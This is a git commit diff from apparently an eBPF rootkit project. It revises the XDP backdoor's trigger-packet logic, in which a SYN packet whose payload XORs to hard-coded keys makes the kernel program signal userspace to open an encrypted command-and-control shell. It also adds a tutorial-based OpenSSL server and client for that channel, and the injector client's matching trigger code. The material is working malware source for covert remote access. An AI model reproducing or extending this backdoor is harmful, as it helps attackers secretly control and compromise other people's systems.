Fixed keys of trigger packet V1, added sample servers, fixed client bug

2025-12-21 17:23:07 +08:00 · 2022-05-05 17:52:58 -04:00
parent 0553ad777f
commit 213e30ba3b
14 changed files with 1625 additions and 1104 deletions
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/Makefile
+++ b/src/Makefile
@@ -87,17 +87,17 @@ $(patsubst %,$(OUTPUT)/%.o, $(APPS)): %.o: %.skel.h
 #User includes and modules
 $(USER_INCLUDES_OBJ): $(wildcard $(USER_INCLUDES_SRC)/**/*.h) | $(OUTPUT)
 	$(call msg,CC,$@)
-	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -c $(USER_INCLUDES_SRC) -o $@
+	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -Wno-deprecated-declarations -c $(USER_INCLUDES_SRC) -o $@

 #User code
 $(OUTPUT)/%.o: $(USER)/%.c $(wildcard $(USER)/*.h)| $(OUTPUT)
 	$(call msg,CC,$@)
-	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -c $(filter $(USER)/%.c,$^) -o $@
+	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -c $(filter $(USER)/%.c,$^) -Wno-deprecated-declarations -o $@

 # Build application binary
 $(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) $(USER_INCLUDES_OBJ) | $(OUTPUT)
 	$(call msg,BINARY,$@)
-	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $^ -lelf -lbpf -lz -o bin/$@
+	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $^ -lelf -lbpf -lz  -lssl -lcrypto -Wno-deprecated-declarations -o bin/$@
 	$(Q)rm $(USER_INCLUDES_OBJ)

 tckit: $(abspath $(EBPF)/include/bpf)/tc.c
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/client/Makefile
+++ b/src/client/Makefile
@@ -1,15 +1,15 @@
 CC = gcc
-HEADERS = lib/RawTCP.h
+HEADERS = lib/RawTCP.h include/sslserver.h
 EXTRA_CFLAGS= -I$(PWD)/lib

 default:
 	make injector

 client.o: client.c $(HEADERS)
-	gcc -c client.c
+	gcc -c -Wno-deprecated-declarations client.c 

 injector: client.o lib/libRawTCP_Lib.a
-	gcc -lm -o injector client.o -L. lib/libRawTCP_Lib.a
+	gcc -lm -o injector client.o -L/usr/lib -lssl -lcrypto -L. lib/libRawTCP_Lib.a

 clean:
 	-rm -f client.o
--- a/src/client/client.c
+++ b/src/client/client.c
@@ -13,6 +13,7 @@
 #include "../common/constants.h"
 #include "../common/c&c.h"
 #include "../common/protocol.h"
+#include "include/sslserver.h"

 // For printing with colors
 #define KGRN  "\x1B[32m"
@@ -205,7 +206,7 @@ void activate_command_control_shell_encrypted(char* argv){
    char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_1;
    char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_2;
    //K3 with command to start the encrypted connection with the backdoor
-    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3 + CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1;
+    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL;
    char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
    strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
--- a/src/client/client.o
+++ b/src/client/client.o
--- a/src/client/include/sslserver.h
+++ b/src/client/include/sslserver.h
@@ -0,0 +1,327 @@
+// This code is based from the following tutorial:
+// https://aticleworld.com/ssl-server-client-using-openssl-in-c/
+// gcc -Wall -o server server.c -L/usr/lib -lssl -lcrypto
+// sudo ./server <portnum>
+
+#include "openssl/err.h"
+#include "openssl/ssl.h"
+#include <arpa/inet.h>
+#include <errno.h>
+#include <malloc.h>
+#include <netinet/in.h>
+#include <resolv.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define FAIL -1
+
+#define USE_FUNCTIONS 0
+
+void instructionsForPem(void) {
+  printf("\n");
+  printf("\n");
+  printf("Did you forget to create your mycert.pem file?\n");
+  printf("\n");
+  printf("Run: openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout "
+         "mycert.pem -out mycert.pem\n");
+  printf("\n");
+  printf("If you haven't, but that's my best guess of what has gone wrong..\n");
+  printf("\n");
+  printf("\n");
+}
+
+#if (USE_FUNCTIONS)
+SSL_CTX *InitServerCTX(void) {
+  const SSL_METHOD *method;
+  SSL_CTX *ctx;
+
+  OpenSSL_add_all_algorithms();     /* load & register all cryptos, etc. */
+  SSL_load_error_strings();         /* load all error messages */
+  method = TLSv1_2_server_method(); /* create new server-method instance */
+  ctx = SSL_CTX_new(method);        /* create new context from method */
+  if (ctx == NULL) {
+    ERR_print_errors_fp(stderr);
+    abort();
+  }
+  return ctx;
+}
+
+void LoadCertificates(SSL_CTX *ctx, const char *CertFile, const char *KeyFile) {
+  /* set the local certificate from CertFile */
+  if (SSL_CTX_use_certificate_file(ctx, CertFile, SSL_FILETYPE_PEM) <= 0) {
+    ERR_print_errors_fp(stderr);
+    instructionsForPem();
+    abort();
+  }
+
+  /* set the private key from KeyFile (may be the same as CertFile) */
+  if (SSL_CTX_use_PrivateKey_file(ctx, KeyFile, SSL_FILETYPE_PEM) <= 0) {
+    ERR_print_errors_fp(stderr);
+    instructionsForPem();
+    abort();
+  }
+
+  /* verify private key */
+  if (!SSL_CTX_check_private_key(ctx)) {
+    fprintf(stderr, "Private key does not match the public certificate\n");
+    abort();
+  }
+}
+
+// Create the SSL socket and intialize the socket address structure
+int OpenListener(int port) {
+  int sd;
+  struct sockaddr_in addr;
+
+  sd = socket(PF_INET, SOCK_STREAM, 0);
+  bzero(&addr, sizeof(addr));
+  addr.sin_family = AF_INET;
+  addr.sin_port = htons(port);
+  addr.sin_addr.s_addr = INADDR_ANY;
+  if (bind(sd, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
+    perror("can't bind port");
+    abort();
+  }
+  if (listen(sd, 10) != 0) {
+    perror("Can't configure listening port");
+    abort();
+  }
+  return sd;
+}
+
+void ShowCerts(SSL *ssl) //? RBW
+{
+  X509 *cert;
+  char *line;
+
+  cert = SSL_get_peer_certificate(ssl); /* Get certificates (if available) */
+  if (cert != NULL) {
+    printf("Server certificates:\n");
+    line = X509_NAME_oneline(X509_get_subject_name(cert), 0, 0);
+    printf("Subject: %s\n", line);
+    free(line);
+    line = X509_NAME_oneline(X509_get_issuer_name(cert), 0, 0);
+    printf("Issuer: %s\n", line);
+    free(line);
+    X509_free(cert);
+  } else {
+    printf("No certificates.\n");
+  }
+}
+
+/* Serve the connection -- threadable */
+void Servlet(SSL *ssl) {
+  char buf[1024] = {0};
+
+  int sd, bytes;
+
+  // this is my attempt to run HTTPS.. This is sort of the minimal header that
+  // seems to work.  \r is absolutely necessary.
+  const char *szHelloWorld =
+      "HTTP/1.1 200 OK\r\n"
+      "Content-type: text/html\r\n"
+      "\r\n"
+      "<html>\n"
+      "<body>\n"
+      "<h1>So, this works, if you added a security exception to your web "
+      "browser</h1>\n"
+      "<h2>Or.... are using a genuine certificate.</h2>\n"
+      "<h3>This is using functions BTW..</h3>\n"
+      "</body>\n"
+      "</html>\n";
+
+  if (SSL_accept(ssl) == FAIL) /* do SSL-protocol accept */
+  {
+    ERR_print_errors_fp(stderr);
+  } else {
+    ShowCerts(ssl);                          /* get any certificates */
+    bytes = SSL_read(ssl, buf, sizeof(buf)); /* get request */
+    buf[bytes] = '\0';
+
+    printf("Client msg:\n[%s]\n", buf);
+
+    if (bytes > 0) {
+      printf("Reply with:\n[%s]\n", szHelloWorld);
+      SSL_write(ssl, szHelloWorld, strlen(szHelloWorld));
+    } else {
+      ERR_print_errors_fp(stderr);
+    }
+  }
+  sd = SSL_get_fd(ssl); /* get socket connection */
+  SSL_free(ssl);        /* release SSL state */
+  close(sd);            /* close connection */
+}
+#endif
+
+int server_run(int argc, char **argv) {
+  SSL_CTX *ctx;
+  int server;
+  int portnum;
+  const char *szPemPublic = "mycert.pem";
+  const char *szPemPrivate = "mycert.pem";
+#if (!(USE_FUNCTIONS))
+  const SSL_METHOD *method;
+#endif
+
+  if (argc != 2) {
+    printf("Usage: %s <portnum>\n", argv[0]);
+    exit(0);
+  }
+
+  portnum = atoi(argv[1]);
+
+  if (portnum < 1024) {
+    if (getuid() != 0) {
+      printf("This program must be run as root/sudo user since your port # "
+             "(%d) is < 1024\n",
+             portnum);
+      exit(1);
+    }
+  }
+
+  SSL_library_init(); /* Initialize the SSL library */
+
+#if (USE_FUNCTIONS)
+  ctx = InitServerCTX(); /* initialize SSL */
+#else
+  // InitServerCTX ();
+  OpenSSL_add_all_algorithms();     /* load & register all cryptos, etc. */
+  SSL_load_error_strings();         /* load all error messages */
+  method = TLSv1_2_server_method(); /* create new server-method instance */
+  ctx = SSL_CTX_new(method);        /* create new context from method */
+  if (ctx == NULL) {
+    ERR_print_errors_fp(stderr);
+    abort();
+  }
+#endif
+
+#if (USE_FUNCTIONS)
+  LoadCertificates(ctx, szPemPublic, szPemPrivate); /* load certs */
+#else
+  /* set the local certificate from CertFile */
+  if (SSL_CTX_use_certificate_file(ctx, szPemPublic, SSL_FILETYPE_PEM) <= 0) {
+    ERR_print_errors_fp(stderr);
+    instructionsForPem();
+    abort();
+  }
+
+  /* set the private key from KeyFile (may be the same as CertFile) */
+  if (SSL_CTX_use_PrivateKey_file(ctx, szPemPrivate, SSL_FILETYPE_PEM) <= 0) {
+    ERR_print_errors_fp(stderr);
+    instructionsForPem();
+    abort();
+  }
+
+  /* verify private key */
+  if (!SSL_CTX_check_private_key(ctx)) {
+    fprintf(stderr, "Private key does not match the public certificate\n");
+    abort();
+  }
+#endif
+
+#if (USE_FUNCTIONS)
+  server = OpenListener(portnum); /* create server socket */
+#else
+  struct sockaddr_in addr;
+
+  server = socket(PF_INET, SOCK_STREAM, 0);
+  bzero(&addr, sizeof(addr));
+  addr.sin_family = AF_INET;
+  addr.sin_port = htons(portnum);
+  addr.sin_addr.s_addr = INADDR_ANY;
+  if (bind(server, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
+    perror("can't bind port");
+    abort();
+  }
+  if (listen(server, 10) != 0) {
+    perror("Can't configure listening port");
+    abort();
+  }
+#endif
+
+  for (;;) {
+    struct sockaddr_in addr;
+    socklen_t len = sizeof(addr);
+    SSL *ssl;
+
+#if (!(USE_FUNCTIONS))
+    char buf[1024] = {0};
+    int sd, bytes;
+
+    // this is my attempt to run HTTPS.. This is sort of the minimal header that
+    // seems to work.  \r is absolutely necessary.
+    const char *szHttpServerResponse =
+        "HTTP/1.1 200 OK\r\n"
+        "Content-type: text/html\r\n"
+        "\r\n"
+        "<html>\n"
+        "<body>\n"
+        "<h1>So, this works, if you added a security exception to your web "
+        "browser</h1>\n"
+        "<h2>Or.... are using a genuine certificate.</h2>\n"
+        "<h3>This is <u><i>NOT</i></u> using functions BTW..</h3>\n"
+        "</body>\n"
+        "</html>\n";
+#endif
+    int client;
+
+    client = accept(server, (struct sockaddr *)&addr,
+                    &len); /* accept connection as usual */
+    printf("Connection: %s:%d\n", inet_ntoa(addr.sin_addr),
+           ntohs(addr.sin_port));
+    ssl = SSL_new(ctx);      /* get new SSL state with context */
+    SSL_set_fd(ssl, client); /* set connection socket to SSL state */
+#if (USE_FUNCTIONS)
+    Servlet(ssl); /* service connection */
+#else
+    if (SSL_accept(ssl) == FAIL) /* do SSL-protocol accept */
+    {
+      ERR_print_errors_fp(stderr);
+    } else {
+      X509 *cert;
+      char *line;
+
+      cert =
+          SSL_get_peer_certificate(ssl); /* Get certificates (if available) */
+      if (cert != NULL) {
+        printf("Server certificates:\n");
+        line = X509_NAME_oneline(X509_get_subject_name(cert), 0, 0);
+        printf("Subject: %s\n", line);
+        free(line);
+        line = X509_NAME_oneline(X509_get_issuer_name(cert), 0, 0);
+        printf("Issuer: %s\n", line);
+        free(line);
+        X509_free(cert);
+      } else {
+        printf("No certificates.\n");
+      }
+
+      // ShowCerts (ssl);                         /* get any certificates */
+      bytes = SSL_read(ssl, buf, sizeof(buf)); /* get request */
+      buf[bytes] = '\0';
+
+      printf("Client msg:\n[%s]\n", buf);
+
+      if (bytes > 0) {
+        printf("Reply with:\n[%s]\n", szHttpServerResponse);
+        SSL_write(ssl, szHttpServerResponse, strlen(szHttpServerResponse));
+      } else {
+        ERR_print_errors_fp(stderr);
+      }
+    }
+    sd = SSL_get_fd(ssl); /* get socket connection */
+    SSL_free(ssl);        /* release SSL state */
+    close(sd);            /* close connection */
+#endif
+    //    break;
+  }
+  close(server); /* close server socket */
+
+  ERR_free_strings(); /* free memory from SSL_load_error_strings */
+  EVP_cleanup();      /* free memory from OpenSSL_add_all_algorithms */
+  SSL_CTX_free(ctx);  /* release context */
+
+  return 0;
+}
--- a/src/client/injector
+++ b/src/client/injector
--- a/src/common/c&c.h
+++ b/src/common/c&c.h
@@ -13,7 +13,8 @@
 #define CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE 0x10
 #define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4"
 #define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13"
-#define CC_TRIGGER_SYN_PACKET_KEY_3 "\x1F\x29"
+#define CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL "\x1F\x29"
+
 #define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02


--- a/src/common/protocol.h
+++ b/src/common/protocol.h
@@ -2,13 +2,7 @@
 #define __PROTOCOL_H

 //V1
-
-//Value added to K3 to define command to send
-#define CC_PROT_K3_TOTAL_DEFINED_KEYS_V1 1
-#define CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1 0x00
-
-
-
+#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0

 //V2
 struct trigger_t {
--- a/src/ebpf/include/xdp/backdoor.h
+++ b/src/ebpf/include/xdp/backdoor.h
@@ -26,7 +26,6 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
    //Loading keys
    __builtin_memcpy(key1, CC_TRIGGER_SYN_PACKET_KEY_1, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    __builtin_memcpy(key2, CC_TRIGGER_SYN_PACKET_KEY_2, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
-    __builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3, CC_TRIGGER_SYN_PACKET_SECTION_LEN);

    //S1 XOR K1
    __builtin_memcpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
@@ -56,21 +55,17 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
    __builtin_memcpy(section3, payload+0x0C, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    int correct = 1;
    int command_received = -1;
-    for(int jj=0; jj<CC_PROT_K3_TOTAL_DEFINED_KEYS_V1; jj++){
-        for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
-            result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
-            if(result3[ii]!=(key3[ii] + jj)){
-                correct = 0;
-            }
+    __builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
+        result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
+        if(result3[ii]!=(key3[ii])){
+            correct = 0;
        }
-        if(correct == 1){
-            //Found valid k3 value
-            command_received = jj;
-            break;
-        }
-        
    }
-    if(correct == 0){
+    if(correct == 1){
+        //Found valid k3 value
+        command_received = CC_PROT_COMMAND_ENCRYPTED_SHELL;
+    }else{
        bpf_printk("FAIL CHECK 3\n");
        return XDP_PASS;
    }
@@ -79,7 +74,7 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
    bpf_printk("Finished backdoor V1 check with success\n");
    int pid = -1; //Received by network stack, just ignore
    switch(command_received){
-        case CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1:
+        case CC_PROT_COMMAND_ENCRYPTED_SHELL:
            bpf_printk("Received request to start encrypted connection\n");
            ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
            break;
--- a/src/user/include/utils/network/ssl_client.h
+++ b/src/user/include/utils/network/ssl_client.h
@@ -0,0 +1,202 @@
+// This is based from:
+// --------------------
+// https://aticleworld.com/ssl-server-client-using-openssl-in-c/
+// gcc -Wall -o client client.c  -L/usr/lib -lssl -lcrypto
+#include <errno.h>
+#include <malloc.h>
+#include <netdb.h>
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+#include <resolv.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <unistd.h>
+
+#define LOCAL_ABORT()                                                          \
+  do {                                                                         \
+    printf("Abort at %s:%d\n", __FILE__, __LINE__);                            \
+    abort();                                                                   \
+  } while (0)
+
+#define USE_FUNCTIONS 0
+
+#if (USE_FUNCTIONS)
+int OpenConnection(const char *hostname, uint16_t port) {
+  int sd;
+  struct hostent *host;
+  struct sockaddr_in addr;
+
+  if ((host = gethostbyname(hostname)) == NULL) {
+    perror(hostname);
+    LOCAL_ABORT();
+  }
+  sd = socket(PF_INET, SOCK_STREAM, 0);
+  bzero(&addr, sizeof(addr));
+  addr.sin_family = AF_INET;
+  addr.sin_port = htons(port);
+  addr.sin_addr.s_addr = *(long *)(host->h_addr);
+
+  if (connect(sd, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
+    close(sd);
+    perror(hostname);
+    fprintf(stderr, "Is the server running, and on the correct port (%d)?\n",
+            port);
+    LOCAL_ABORT();
+  }
+  return sd;
+}
+
+SSL_CTX *InitCTX(void) {
+  const SSL_METHOD *method;
+  SSL_CTX *ctx;
+
+  OpenSSL_add_all_algorithms();     /* Load cryptos, et.al. */
+  SSL_load_error_strings();         /* Bring in and register error messages */
+  method = TLSv1_2_client_method(); /* Create new client-method instance */
+  ctx = SSL_CTX_new(method);        /* Create new context */
+  if (ctx == NULL) {
+    ERR_print_errors_fp(stderr);
+    LOCAL_ABORT();
+  }
+  return ctx;
+}
+
+void ShowCerts(SSL *ssl) {
+  X509 *cert;
+  char *line;
+  cert = SSL_get_peer_certificate(ssl); /* get the server's certificate */
+  if (cert != NULL) {
+    printf("Server certificates:\n");
+    line = X509_NAME_oneline(X509_get_subject_name(cert), 0, 0);
+    printf("Subject: %s\n", line);
+    free(line); /* free the malloc'ed string */
+    line = X509_NAME_oneline(X509_get_issuer_name(cert), 0, 0);
+    printf("Issuer: %s\n\n", line);
+    free(line);      /* free the malloc'ed string */
+    X509_free(cert); /* free the malloc'ed certificate copy */
+  } else {
+    printf("Info: No client certificates configured.\n");
+  }
+}
+#endif
+
+int clientrun(int argc, char **argv) {
+  SSL_CTX *ctx;
+  int server;
+  SSL *ssl;
+  static char buf[1024 * 1024];
+  int bytes;
+  char *hostname;
+  uint16_t portnum;
+#if (!(USE_FUNCTIONS))
+  struct hostent *host;
+  struct sockaddr_in addr;
+  const SSL_METHOD *method;
+#endif
+
+  if (argc != 3) {
+    printf("usage: %s <hostname> <portnum>\n", argv[0]);
+    exit(0);
+  }
+
+  // Initialize the SSL library
+  SSL_library_init();
+
+  hostname = argv[1];
+  portnum = atoi(argv[2]);
+
+#if (USE_FUNCTIONS)
+  ctx = InitCTX();
+  server = OpenConnection(hostname, portnum);
+#else
+  OpenSSL_add_all_algorithms();     /* Load cryptos, et.al. */
+  SSL_load_error_strings();         /* Bring in and register error messages */
+  method = TLSv1_2_client_method(); /* Create new client-method instance */
+  ctx = SSL_CTX_new(method);        /* Create new context */
+  if (ctx == NULL) {
+    ERR_print_errors_fp(stderr);
+    LOCAL_ABORT();
+  }
+
+  if ((host = gethostbyname(hostname)) == NULL) {
+    perror(hostname);
+    LOCAL_ABORT();
+  }
+  server = socket(PF_INET, SOCK_STREAM, 0);
+  bzero(&addr, sizeof(addr));
+  addr.sin_family = AF_INET;
+  addr.sin_port = htons(portnum);
+  addr.sin_addr.s_addr = *(long *)(host->h_addr);
+
+  if (connect(server, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
+    close(server);
+    perror(hostname);
+    fprintf(stderr, "Is the server running, and on the correct port (%d)?\n",
+            portnum);
+    LOCAL_ABORT();
+  }
+#endif
+
+  ssl = SSL_new(ctx);        /* create new SSL connection state */
+  SSL_set_fd(ssl, server);   /* attach the socket descriptor */
+  if (SSL_connect(ssl) <= 0) /* perform the connection */
+  {
+    ERR_print_errors_fp(stderr);
+  } else {
+#if (!(USE_FUNCTIONS))
+    X509 *cert;
+    char *line;
+#endif
+    char szRequest[4096];
+    sprintf(szRequest,
+            "GET / HTTP/1.1\r\n"
+            "User-Agent: Wget/1.17.1 (linux-gnu)\r\n"
+            "Accept: */*\r\n"
+            "Accept-Encoding: identity\r\n"
+            "Host: %s:%d\r\n"
+            //             "Connection: Keep-Alive\n"
+            "\r\n",
+            hostname, portnum);
+
+    printf("Sending:\n[%s]\n", szRequest);
+
+    printf("\n\nConnected with %s encryption\n", SSL_get_cipher(ssl));
+
+#if (USE_FUNCTIONS)
+    ShowCerts(ssl); /* get any certs */
+#else
+    cert = SSL_get_peer_certificate(ssl); /* get the server's certificate */
+    if (cert != NULL) {
+      printf("Server certificates:\n");
+      line = X509_NAME_oneline(X509_get_subject_name(cert), 0, 0);
+      printf("Subject: %s\n", line);
+      free(line); /* free the malloc'ed string */
+      line = X509_NAME_oneline(X509_get_issuer_name(cert), 0, 0);
+      printf("Issuer: %s\n\n", line);
+      free(line);      /* free the malloc'ed string */
+      X509_free(cert); /* free the malloc'ed certificate copy */
+    } else {
+      printf("Info: No client certificates configured.\n");
+    }
+#endif
+
+    SSL_write(ssl, szRequest, strlen(szRequest)); /* encrypt & send message */
+
+    bytes = SSL_read(ssl, buf, sizeof(buf)); /* get reply & decrypt */
+    buf[bytes] = 0;
+    printf("Received (%d bytes):\n[%s]\n", bytes, buf);
+
+    // second send.. - for my real web page, it comes in two parts.
+    // bytes = SSL_read (ssl, buf, sizeof (buf)); /* get reply & decrypt */
+    // buf[bytes] = 0;
+    // printf ("Received (%d bytes):\n[%s]\n", bytes, buf);
+
+    SSL_free(ssl); /* release connection state */
+  }
+
+  close(server);     /* close socket */
+  SSL_CTX_free(ctx); /* release context */
+
+  return 0;
+}
--- a/src/user/kit.c
+++ b/src/user/kit.c
@@ -19,6 +19,7 @@
 #include "include/utils/strings/regex.h"
 #include "include/utils/structures/fdlist.h"
 #include "include/modules/module_manager.h"
+#include "include/utils/network/ssl_client.h"

 #define ABORT_IF_ERR(err, msg)\
 	if(err<0){\
@@ -107,7 +108,7 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
 	}else if(e->event_type == COMMAND){
 		printf("%s COMMAND  pid:%d code:%i\n", ts, e->pid, e->code);
 		switch(e->code){
-			case CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1:
+			case CC_PROT_COMMAND_ENCRYPTED_SHELL:
 				printf("Starting encrypted connection\n");
 				
            	break;